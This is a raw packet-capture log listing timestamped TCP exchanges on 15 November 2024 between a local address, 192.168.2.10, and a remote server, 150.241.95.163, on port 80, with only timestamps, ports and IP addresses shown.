Nov 15, 2024 10:28:59.653583050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653593063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653640985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.662647009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.662672043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.662683964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.662734985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.663079023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663090944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663101912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663114071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663125038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663136005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663140059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.663149118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663181067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.663181067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.663336039 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.663402081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663422108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663434982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.663567066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.667026997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.667048931 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.667062044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.667107105 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.667298079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.670577049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.670603037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.670614958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.670651913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.673707962 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.673724890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.673738956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.673751116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.673813105 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.673813105 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.689796925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689825058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689836979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689851046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689909935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.689935923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689948082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689959049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689991951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.689991951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.689991951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690005064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690006971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690078974 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690263033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690283060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690294981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690305948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690340042 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690402985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690753937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690766096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690777063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690788984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.690809965 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690937996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.690989971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691025972 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691036940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691070080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691082001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691112041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.691112041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.691487074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691546917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.691579103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691592932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691679001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691690922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691703081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691710949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.691766977 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.691768885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.691869020 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.692816973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.692831039 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.692846060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.692904949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.697972059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.697993994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698007107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698018074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698031902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698031902 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.698044062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698081017 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.698426962 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.698440075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698451042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698462963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698474884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.698508978 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.698543072 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.699043989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699054956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699062109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699081898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699093103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699105024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.699139118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.699182034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.701853991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.701941013 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.701983929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.701996088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.702055931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.704168081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704219103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704237938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704257011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704282999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704318047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.704359055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704411983 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.704411983 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.704418898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704438925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704452038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704462051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.704520941 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.704520941 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.709034920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.709067106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.709079981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.709122896 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.711221933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711235046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711246014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711291075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.711332083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711344957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711355925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.711370945 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.711432934 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.713437080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.713480949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.713491917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.713505030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.713545084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.716593027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.716604948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.716615915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.716656923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.716707945 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.719338894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719351053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719367981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719379902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719403982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719413996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.719432116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.719432116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.719517946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.720685959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.720699072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.720710993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.720772028 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.720779896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.720808029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.720849991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.725630045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725683928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.725703955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725714922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725725889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725749969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725750923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.725763083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725810051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725821972 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.725825071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725864887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725881100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.725914955 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.725914955 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.729082108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.729093075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.729142904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.729146957 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.729193926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.729208946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.732012987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.732032061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.732045889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.732069016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.732095003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.732126951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.736399889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.736501932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.736501932 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.736515999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.736557007 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.741260052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.741314888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.741345882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.741384983 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.743990898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.744003057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.744015932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.744048119 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.744110107 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.751283884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751386881 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751399040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751429081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751432896 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.751446009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751478910 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751488924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.751498938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751513004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751538992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751564980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751566887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.751566887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.751575947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.751611948 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.754977942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.755001068 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.755012989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.755054951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.755109072 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.758374929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.758388042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.758400917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.758506060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.762314081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.762367010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.762378931 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.762420893 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.762420893 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.762423992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.762437105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.762480021 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.766036034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.766050100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.766062021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.766324043 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.770025015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770083904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770086050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.770096064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770144939 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.770148993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770167112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770179033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770235062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.770339966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770373106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770385027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.770401001 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.770457029 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779659033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779671907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779685974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779696941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779720068 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779736042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779779911 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779784918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779797077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779807091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779835939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779846907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779859066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779861927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779861927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779870033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.779885054 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.779916048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.780319929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.780364037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.780404091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.780412912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.780497074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.783770084 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.783792973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.783808947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.783864021 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.787538052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.787566900 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.787579060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.787622929 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.791027069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.791085958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.791096926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.791160107 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.806771040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806799889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806812048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806833029 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.806838036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806850910 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806864977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806886911 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.806906939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806920052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.806955099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.806955099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807019949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807065964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807075977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807085991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807132006 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807213068 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807260036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807271004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807296038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807301998 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807307959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807611942 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807656050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807668924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807693958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807734966 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807735920 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807813883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807869911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807881117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807940960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807951927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.807974100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.807991028 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.808229923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.808283091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.808293104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.808337927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.808337927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.808351040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.808363914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.808398008 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.809998989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.810013056 CET	80	49762	150.241.95.163	192.168.2.10
